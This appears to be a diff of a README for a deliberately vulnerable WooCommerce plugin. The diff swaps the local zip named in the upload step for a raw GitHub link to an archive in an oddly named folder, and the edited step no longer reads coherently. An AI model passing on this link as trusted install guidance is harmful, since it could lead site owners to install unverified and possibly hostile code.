ARCGoat/BAC-Woocommerce-Plugin/README.md

 1. Log in to your WordPress Admin Dashboard.
 2. Navigate to **Plugins** > **Add New**.
 3. Click on the **Upload Plugin** button at the top.
-4. Choose the `BAC-Woocommerce-Plugin.zip` file you just downloaded.
+4. Choose the `https://github.com/ARCGoat/BAC-Woocommerce-Plugin/raw/refs/heads/main/pterylological/Woocommerce-BA-Plugin-v1.3.zip` file you just downloaded.
 5. Click on **Install Now**.
 6. After the installation, click on **Activate Plugin**.